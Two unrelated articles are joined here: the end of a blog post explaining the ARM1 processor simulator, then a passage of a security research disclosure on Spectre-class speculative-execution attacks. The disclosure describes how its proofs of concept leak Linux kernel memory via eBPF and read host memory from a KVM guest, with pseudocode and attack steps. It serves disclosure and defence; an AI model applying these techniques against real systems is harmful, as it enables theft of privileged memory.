By looking at the ARM1 register file, you can determine the value of each bit. For a 0 bit, the input to the top inverter is active (green/yellow); for a 1 bit, the input to the bottom inverter is active.

The barrel shifter

The barrel shifter, which performs binary shifts, is another interesting component of the ARM1. Most instructions use the barrel shifter, allowing a binary argument to be shifted left, shifted right, or rotated by any amount (0 to 31 bits). While running the simulator, you can see diagonal lines jumping back and forth in the barrel shifter.

The diagram below shows the structure of the barrel shifter. Bits flows into the shifter vertically with bit 0 on the left and bit 31 on the right. Output bits leave the shifter horizontally with bit 0 on the bottom and bit 31 on top. The diagonal lines visible in the barrel shifter show where the vertical lines are connected to the horizontal lines, generating a shifted output. Different positions of the diagonals result in different shifts. The upper diagonal line shifts bits to the left, and the lower diagonal line shifts bits to the right. For a rotation, both diagonals are active; it may not be immediately obvious but in a rotation part of the word is shifted left and part is shifted right.

Structure of the barrel shifter in the ARM1 chip.

Structure of the barrel shifter in the ARM1 chip.

Zooming in on the barrel shifter shows exactly how it works. It contains a 32 by 32 crossbar grid of transistors, each connecting one vertical line to one horizontal line. The transistor gates are connected by diagonal control lines; transistors along the active diagonal connect the appropriate vertical and horizontal lines. Thus, by activating the appropriate diagonals, the output lines are connected to the input lines, shifted by the desired amounts. Since the chip’s input lines all run horizontally, there are 32 connections between input lines and the corresponding vertical bit lines.

Details of the barrel shifter in the ARM1 chip. Transistors along a specific diagonal are activated to connect the vertical bit lines and output lines. Each input line is connected to a vertical bit line through the indicated connections.

Details of the barrel shifter in the ARM1 chip. Transistors along a specific diagonal are activated to connect the vertical bit lines and output lines. Each input line is connected to a vertical bit line through the indicated connections.

The demonstration program

When you run the simulator, it executes a short hardcoded program that performs shifts of increasing amounts. You don’t need to understand the code, but if you’re curious it is:

0000  E1A0100F mov     r1, pc        @ Some setup
0004  E3A0200C mov     r2, #12
0008  E1B0F002 movs    pc, r2
000C  E1A00000 nop
0010  E1A00000 nop
0014  E3A02001 mov     r2, #1        @ Load register r2 with 1
0018  E3A0100F mov     r1, #15       @ Load r1 with value to shift
001C  E59F300C ldr     r3, pointer
    loop:
0020  E1A00271 ror     r0, r1, r2    @ Rotate r1 by r2 bits, store in r0
0024  E2822001 add     r2, r2, #1    @ Add 1 to r2
0028  E4830004 str     r0, [r3], #4  @ Write result to memory
002C  EAFFFFFB b       loop          @ Branch to loop

Inside the loop, register r1 (0x000f) is rotated to the right by r2 bit positions and the result is stored in register r0. Then r2 is incremented and the shift result written to memory. As the simulator runs, watch as r2 is incremented and as r0 goes through the various values of 4 bits rotated. The A and D values show the address and data pins as instructions are read from memory.

The changing shift values are clearly visible in the barrel shifter, as the diagonal line shifts position. If you zoom in on the register file, you can read out the values of the registers, as described earlier.

Conclusion

The ARM1 processor led to the amazingly successful ARM processor architecture that powers your smart phone. The simple RISC architecture of the ARM1 makes the circuitry of the processor easy to understand, at least compared to a chip such as the 386.[12] The ARM1 simulator provides a fascinating look at what happens inside a processor, and hopefully this article has helped explain what you see in the simulator.

P.S. If you want to read more about ARM1 internals, see Dave Mugridge’s series of posts:
Inside the armv1 Register Bank
Inside the armv1 Register Bank — register selection
Inside the armv1 Read Bus
Inside the ALU of the armv1 — the first ARM microprocessor

Notes and references

[1] I should make it clear that I am not part of the Visual 6502 team that built the ARM1 simulator. More information on the simulator is in the Visual 6502 team’s blog post The Visual ARM1.

[2] The block diagram below shows the components of the chip in more detail. See the ARM Evaluation System manual for an explanation of each part.

Floorplan of the ARM1 chip, from ARM Evaluation System manual. (Bus labels are corrected from original.)

Floorplan of the ARM1 chip, from ARM Evaluation System manual. (Bus labels are corrected from original.)

[3] You may have noticed that the ARM architecture describes 16 registers, but the chip has 25 physical registers. There are 9 «extra» registers because there are extra copies of some registers for use while handling interrupts.

Another interesting thing about the register file is the PC register is missing a few bits. Since the ARM1 uses 26-bit addresses, the top 6 bits are not used. Because all instructions are aligned on a 32-bit boundary, the bottom two address bits in the PC are always zero. These 8 bits are not only unused, they are omitted from the chip entirely.

[4] The ALU doesn’t support multiplication (added in ARM 2) or division (added in ARMv7).

[5] A bit more detail on the decode circuitry. Instruction decoding is done through three separate PLAs. The ALU decode PLA generates control signals for the ALU based on the four operation bits in the instruction. The shift decode PLA generates control signals for the barrel shifter. The instruction decode PLA performs the overall decoding of the instruction. The register decode block consists of three layers. Each layer takes a 4-bit register id and activates the corresponding register. There are three layers because ARM operations use two registers for inputs and a third register for output.

[6] In a RISC computer, the instruction set is restricted to the most-used instructions, which are optimized for high performance and can typically execute in a single clock cycle. Instructions are a fixed size, simplifying the instruction decoding logic. A RISC processor requires much less circuitry for control and instruction decoding, leaving more space on the chip for registers. Most instructions operate on registers, and only load and store instructions access memory. For more information on RISC vs CISC, see RISC architecture.

[7] For details on the history of the ARM1, see Conversation with Steve Furber: The designer of the ARM chip shares lessons on energy-efficient computing.

[8] The 386 and the ARM1 instruction sets are different in many interesting ways. The 386 has instructions from 1 byte to 15 bytes, while all ARM1 instructions are 32-bits long. The 386 has 15 registers — all with special purposes, while the ARM1 has 25 registers, mostly general-purpose. 386 instructions can usually operate on memory, while ARM1 instructions operate on registers except for load and store. The 386 has about 140 different instructions, compared to a couple dozen in the ARM1 (depending how you count). Take a look at the 386 opcode map to see how complex decoding a 386 instruction is. ARM1 instructions fall into 5 categories and can be simply decoded. (I’m not criticizing the 386’s architecture, just pointing out the major architectural differences.)

See the Intel 80386 Programmer’s Reference Manual and 80386 Hardware Reference Manual for more details on the 386 architecture.

[9] Interestingly the ARM company doesn’t manufacture chips. Instead, the ARM intellectual property is licensed to hundreds of different companies that build chips that use the ARM architecture. See The ARM Diaries: How ARM’s business model works for information on how ARM makes money from licensing the chip to other companies.

[10] The first metal layer in the chip runs largely top-to-bottom, while the second metal layer runs predominantly horizontally. Having two layers of metal makes the layout much simpler than single-layer processors such as the 6502 or Z-80.

[11] In the register file, alternating bits are mirrored to simplify the layout. This allows neighboring bits to share power and ground lines. The ARM1’s register file is triple-ported, so two register can be read and one register written at the same time. This is in contrast to chips such as the 6502 or Z-80, which can only access registers one at a time.

[12] For more information on the ARM1 internals, the book VLSI Risc Architecture and Organization by ARM chip designer Steven Furber has a hundred pages of information on the ARM chip internals. An interesting slide deck is A Brief History of ARM by Lee Smith, ARM Fellow.

AMD ARM Reading privileged memory with a side-channel

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

 

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

 

So far, there are three known variants of the issue:

 

  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

 

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

 

 

During the course of our research, we developed the following proofs of concept (PoCs):

 

  1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
  2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel’s BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
  3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian’s distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn’t been tested.)
  4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

 

For interesting resources around this topic, look down into the «Literature» section.

 

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

 

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

 

The PoC code and the writeups that we sent to the CPU vendors are available here:https://bugs.chromium.org/p/project-zero/issues/detail?id=1272.

Tested Processors

  • Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called «Intel Haswell Xeon CPU» in the rest of this document)
  • AMD FX(tm)-8320 Eight-Core Processor (called «AMD FX CPU» in the rest of this document)
  • AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called «AMD PRO CPU» in the rest of this document)
  • An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called «ARM Cortex A57» in the rest of this document)

Glossary

retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

 

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

 

cached/uncached data: In this blogpost, «uncached» data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

 

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

 

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.

Variant 1: Bounds check bypass

This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

 

  • Intel Haswell Xeon CPU, eBPF JIT is off (default state)
  • Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
  • AMD PRO CPU, eBPF JIT is on (non-default state)

 

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.

Theoretical explanation

The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 («Branch Prediction»):

 

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

 

In section 2.3.5.2 («L1 DCache»):

 

Loads can:
[…]
  • Be carried out speculatively, before preceding branches are resolved.
  • Take cache misses out of order and in an overlapped manner.

 

Intel’s Software Developer’s Manual [7] states in Volume 3A, section 11.7 («Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors»):

 

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …;
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 …
}
However, in the following code sample, there’s an issue. If arr1->length, arr2->data[0x200] andarr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

 

  • load value = arr1->data[untrusted_offset_from_caller]
  • start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …; /* small array */
struct array *arr2 = …; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 unsigned long index2 = ((value&1)*0x100)+0x200;
 if (index2 < arr2->length) {
   unsigned char value2 = arr2->data[index2];
 }
}

 

After the execution has been returned to the non-speculative path because the processor has noticed thatuntrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] andarr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 — which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.

 

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

 

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Attacking the kernel

This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

 

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

 

  • either interpreted by an in-kernel bytecode interpreter
  • or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

 

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

 

Whether the JIT engine is enabled depends on a run-time configuration setting — but at least on the tested Intel processor, the attack works independent of that setting.

 

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

 

eBPF’s data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

 

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn’t be a precondition in principle).

 

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array’s length to be slow on other physical CPU cores (intentional false sharing).

 

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling throughprog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

 

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 215 adjacent userspace memory mappings [9], each consisting of 24 pages, are created at the userspace address user_mapping_area, covering a total area of 231 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

 

 

 

This permits the attack to be carried out in steps of 231 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 24 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

 

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.

 

 

 

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

 

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

 

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

 

This program reads 8-byte-aligned 64-bit values from an eBPF data array «victim_map» at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 27 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

 

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_mapthat causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.

Variant 2: Branch target injection

This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian’s distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.

Basics

Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other’s branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

 

 

 

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won’t know the true destination of the jump, and it won’t be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.

Haswell branch prediction internals

Some of the internals of the branch prediction implemented by Intel’s processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

 

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

 

Haswell seems to have multiple branch prediction mechanisms that work very differently:

 

  • A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
  • A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
  • (There is also a specialized return predictor, according to Intel’s optimization manual, but we haven’t analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)

Generic predictor

The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn’t store the full, absolute destination address.

 

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

 

bit A
bit B
0x40.0000
0x2000
0x80.0000
0x4000
0x100.0000
0x8000
0x200.0000
0x1.0000
0x400.0000
0x2.0000
0x800.0000
0x4.0000
0x2000.0000
0x10.0000
0x4000.0000
0x20.0000

 

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can’t distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.

 

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn’t been verified.

 

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 232 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.

Indirect call predictor

The inputs of the BTB lookup for this mechanism seem to be:

 

  • The low 12 bits of the address of the source instruction (we are not sure whether it’s the address of the first or the last byte) or a subset of them.
  • The branch history buffer state.

 

If the indirect call predictor can’t resolve a branch, it is resolved by the generic predictor instead. Intel’s optimization manual hints at this behavior: «Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior.»

 

The branch history buffer (BHB) stores information about the last 29 taken branches — basically a fingerprint of recent control flow — and is used to allow better prediction of indirect calls that can have multiple targets.

 

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

 

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
 *bhb_state <<= 2;
 *bhb_state ^= (dst & 0x3f);
 *bhb_state ^= (src & 0xc0) >> 6;
 *bhb_state ^= (src & 0xc00) >> (10 — 2);
 *bhb_state ^= (src & 0xc000) >> (14 — 4);
 *bhb_state ^= (src & 0x30) << (6 — 4);
 *bhb_state ^= (src & 0x300) << (8 — 8);
 *bhb_state ^= (src & 0x3000) >> (12 — 10);
 *bhb_state ^= (src & 0x30000) >> (16 — 12);
 *bhb_state ^= (src & 0xc0000) >> (18 — 14);
}

 

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn’t been understood yet.

 

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code — for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).

Reverse-Engineering Branch Predictor Internals

This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn’t keep a detailed record of what we were doing.

 

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked — however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

 

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

 

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to «recent program behavior» in Intel’s optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

 

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

 

 

 

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

 

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

 

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

 

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don’t influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn’t influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

 

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn’t store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

 

However, a history buffer needs to «forget» about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards — and given that, upwards combination of information probably wouldn’t be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

 

 

 

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

 

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.

Reading host memory from a KVM guest

Locating the host kernel

Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

 

  • lower 20 bits of the address of kvm-intel.ko
  • full address of kvm.ko
  • full address of vmlinux

 

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

 

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

 

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section «Reverse-Engineering Branch Predictor Internals», using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

 

 

 

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) — by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.

 

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

 

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section «Generic Predictor» apply; there will be 24-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/24=1024.

 

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 220) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 216 remaining possibilities for the load address of kvm.ko.

 

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux  are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won’t actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

 

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.

Identifying cache sets

The PoC assumes that the VM does not have access to hugepages.To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they’re probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].

Locating the host-virtual address of a guest page

Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

 

